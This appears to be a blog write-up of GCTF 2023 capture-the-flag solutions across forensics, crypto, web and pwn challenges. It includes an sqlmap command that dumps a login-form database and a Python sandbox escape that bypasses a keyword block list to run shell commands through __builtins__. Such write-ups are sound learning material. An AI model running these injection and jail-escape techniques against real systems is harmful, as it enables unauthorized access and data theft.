GCTF 2023 Writeup

date

Dec 16, 2023

slug

gctf23-ctrlf

author

status

Public

tags

GCTF

CTRL+F

CTF

summary

A brief writeup for GCTF 2023.

type

Post

thumbnail

category

📗 CTF Writeup

updatedAt

Mar 3, 2025 06:37 PM

Forensics

Wireshark #1

• Open the pcap file and filter for http

• Right click and follow tcp stream

• Observe the content and the flag is displayed

GCTF2023{fl4g_in_tcp_dump}

Broken

GCTF2023{M3_4nd_my_Br0k3n_h3art}

KB

• The Wireshark only has USB packets

• Since the data length of the leftover capture data of a packet is 8 bytes, it is established that the data originates from a keyboard, with the keystroke at the 3rd byte

• Each value corresponds to different keys. The full keyboard keymap is referenced here:
• https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf (Page 53-59)
• This also works: https://web.archive.org/web/20170219081148/https://www.usb.org/developers/hidpage/Hut1_12v2.pdf (Page 53-59)

• To extract the Leftover Capture Data field: tshark -r challenge.pcapng -T fields -e usb.capdata > usbdata.txt

• To clean the data afterwards and modify some manually:
• https://gchq.github.io/CyberChef/#recipe=Remove_whitespace(true,true,true,true,true,false)Find_/_Replace({'option':'Regex','string':'0000'},'',true,false,true,false)Find_/_Replace({'option':'Regex','string':'0000000000'},'',true,false,true,false)Find_/_Replace({'option':'Regex','string':'00'},'',true,false,true,false)Find_/_Replace({'option':'Regex','string':'0202'},'',true,false,true,false)&input=CgoKCgoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDBhMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDA2MDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDE3MDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDA5MDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDFmMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDI3MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDFmMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDIwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDJmMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDFlMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDExMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE3MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDIwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE1MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDA2MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDIwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDEzMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE3MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDFlMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDExMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDBhMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDJkMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDBlMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDA4MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDFjMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE2MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE3MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDE1MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDI3MDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDBlMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDAwMDIwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDIwMDMwMDAwMDAwMDAwMAoKMDIwMDAwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoKMDEwMDAwMDAwMDAwMDAwMAoKMDAwMDAwMDAwMDAwMDAwMAoK
• Or you could just use the script provided here lol: https://ctf-wiki.mahaloz.re/misc/traffic/protocols/USB/

#!/usr/bin/env python

import sys
import os

DataFileName = "usb.dat"

presses = []

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

def main():
    # check argv
    if len(sys.argv) != 2:
        print("Usage : ")
        print("        python UsbKeyboardHacker.py data.pcap")
        print("Tips : ")
        print("        To use this python script , you must install the tshark first.")
        print("        You can use `sudo apt-get install tshark` to install it")
        print("Author : ")
        print("        WangYihang <wangyihanger@gmail.com>")
        print("        If you have any questions , please contact me by email.")
        print("        Thank you for using.")
        exit(1)

    # get argv
    pcapFilePath = sys.argv[1]

    # get data of pcap
    os.system("tshark -r %s -T fields -e usb.capdata 'usb.data_len == 8' > %s" % (pcapFilePath, DataFileName))

    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            presses.append(line[0:-1])
    # handle
    result = ""
    for press in presses:
        if press == '':
            continue
        if ':' in press:
            Bytes = press.split(":")
        else:
            Bytes = [press[i:i+2] for i in range(0, len(press), 2)]
        if Bytes[0] == "00":
            if Bytes[2] != "00" and normalKeys.get(Bytes[2]):
                result += normalKeys[Bytes[2]]
        elif int(Bytes[0],16) & 0b10 or int(Bytes[0],16) & 0b100000: # Shift key is pressed
            if Bytes[2] != "00" and normalKeys.get(Bytes[2]):
                result += shiftKeys[Bytes[2]]
        else:
            print("[-] Unknown Key : %s" % (Bytes[0]))
    print("[+] Found : %s" % (result))

    # clean the temp data
    os.system("rm ./%s" % (DataFileName))


if __name__ == "__main__":
    main()

• The final indication:
0a061709 → GCTF
02 → Ignored
1f271f22 → 2023
02 → Ignored
2f → {
02 → Ignored
1e11172015062013171e110a2d → 1NT3RC3PT1NG_
02
0e081c161715270e22 (It’s 20, Cyberchef aint correct so I reviewed it manually from here) → KEYSTR0K3
02 → Ignored
30 → }
01 → Ignored

GCTF2023{1NT3RC3PT1NG_KEYSTR0K3}

History

GCTF2023{Chr0m1um_h1st0ry}

Misc

Frequency

GCTF2023{this_fl4g_sounds_weirddddddd}

Master Hidden Within the Slides

• Can view invisible objects by going Home > Arrange > Selection Pane but turns out PowerPoint is just delulu

GCTF{Sl1d3sss_M4staaaaaaa}

Office

• Unhide sheet 3

• Realize that when certain cells are hovered, they have a value of 1

• Conditional formatting to quickly “colour” the cells with values

• Adjust column width to 2

• Scan the QR code shown



https://me-qr.com/e6O1bSEx

GCTF2023{F0rmatt1ng_c311s_t0_h1d3_inf0rm4t10n}

Splitter

• Apparently the pictures are all in order

• Just zoom in nicely in File Explorer

GCTF2023{JJK_SHIBUYA_ARK_IS_INSANE} ”Yes it was insane, RIP Nanami” - PLZ ENTER TEXT

Crypto

RSA

• Given the file with the code snippet as displayed in the image below

• Insert the given equation in the online decoder to perform automated decryption

GCTF2023{s1mpl3_RSA_n0_pr3ssur3}

Layers of Bases

GCTF2023{L4y3rs_0f_3ncrypt10n}

DES

• Password: gctf2023

• -d: Indicates that it’s a decryption

• -a: Specifies that the input and output should be base64 encoded/decoded

• -pbkdf2: Uses Password-Based Key Derivation Function 2 (PBKDF2) for key derivation

GCTF2023{Op3nSSL_3ncrypt1onnnnnnnnnnn}

Web

Secret

• Check for robots.txt for the page

• Hidden directory named /noOneG0nnaF1ndOut is then obtained, and an index page is then displayed with a file directory named flag

• Click on the flag directory and the flag will then be obtained

GCTF{d0_n0t_forg3t_t0_ch3ck_robOt5_txt}

Login

• Intercept request using BurpSuite

• Change values in the form field to *

• Save as item

• Automate SQL wahoo: sqlmap -r login.req --batch --dump

GCTF2023{nu11_nu11_nul1_nu1l_0h_fl4g}

Pwn

Warmup

“Ok after the CTF I realised I just had to compile all the answers together AAAAAAAAAAAAAAAAAA SAKIT HATIKU” - PLZ ENTER TEXT

import socket
import re

# Define the IP address and port to connect
ip_address = '167.172.74.195'
port = 8005

# Create a socket and connect to the server
bot = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bot.connect((ip_address, port))

# Extract the question and calculate the answer
while True:

    data = bot.recv(1024).decode()
    print(data)

    if "bad?" in data:
        continue

    # Extract numbers from the equation
    numbers = re.findall(r'\d+', data)

    if numbers:
        # Convert the numbers to integers
        numbers = [int(num) for num in numbers]

        # Calculate the sum
        result = sum(numbers)

        # Print the result
        print(result)

        # Send the result back to the server
        bot.send(str(result).encode())
        bot.send("\n".encode())
        continue
    else:
        print(data)
    break

import socket
import re

# Define the IP address and port to connect
ip_address = '167.172.74.195'
port = 8005

# Create a socket and connect to the server
bot = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bot.connect((ip_address, port))

# Extract the question and calculate the answer
while True:

    data = bot.recv(1024).decode()
    print(str.split(data))
    
    if "+" in str.split(data):

        # Extract numbers from the equation
        numbers = re.findall(r'\d+', data)

        # Convert the numbers to integers
        numbers = [int(num) for num in numbers]

        # Calculate the sum
        result = sum(numbers)

        # Print the result
        print(result)

        # Send the result back to the server
        bot.send(str(result).encode())
        bot.send("\n".encode())
        continue

    else:
        print(data)
        continue

    break

Level 1

GCTF2023{R3ady_P14y3r_On3!!}

Level 2

#! /usr/bin/python3 -u

def main():
    print("""
  _                    _   ___  
 | |                  | | |__ \ 
 | |     _____   _____| |    ) |
 | |    / _ \ \ / / _ \ |   / / 
 | |___|  __/\ V /  __/ |  / /_ 
 |______\___| \_/ \___|_| |____|
                                """)
    print("Note: Flag at /flag")
    print("Can you bypass this?")

    while True:
        try:
            inp = input('>>> ')
            for jail in ['exec', 'eval', 'system', 'os', 'import', 'open', 'read', 'write']:
                if jail in inp:
                    raise Exception("You Shall Not Pass!")      
            print(eval(inp))
        except Exception as e:
            print(f"Error: {e}")

if __name__ == "__main__":
    main()

>>> __builtins__.__dict__['open']
<built-in function open>

>>> print(__builtins__.__dict__['OPEN'.lower()])
<built-in function open>

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /flag')

GCTF2023{Lev3l_tw0_lessgoooooo_g00d_luck_at_l3v3l_3}